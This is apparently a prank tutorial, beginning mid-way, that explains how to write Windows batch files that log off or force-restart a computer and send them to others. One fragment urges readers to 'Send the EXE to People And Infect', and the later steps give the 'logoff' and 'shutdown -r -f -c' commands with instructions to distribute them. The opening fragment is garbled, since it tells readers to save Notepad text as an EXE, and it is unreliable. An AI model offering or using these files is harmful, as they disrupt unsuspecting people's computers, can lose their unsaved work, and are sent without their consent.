Write The Following In Notepad Exactly as it says

Step 2.
Save As An EXE Any Name Will Do

Step 3.
Send the EXE to People And Infect  

logff someones computer....

Step 1 : open a blank text doc
Step 2 : write "logoff"
Step 3 : go to "Save as"
Step 4 : type the name you want and follow it with .bat
e.g. "abc.bat"
Step 5 : save that file. But don't open it.
Step 6 : send to others

restart someones computer

Step 1 : open a blank text doc
Step 2 : write "shutdown -r -f -c "***"
Step 3 : replace *** with what you want it to say like "HAHA"
Step 4 : go to "Save as"
Step 5 : type the name you want and follow it with .bat
e.g. "abc.bat"
Step 6 : save that file. But don't open it.
Step7 : send to others
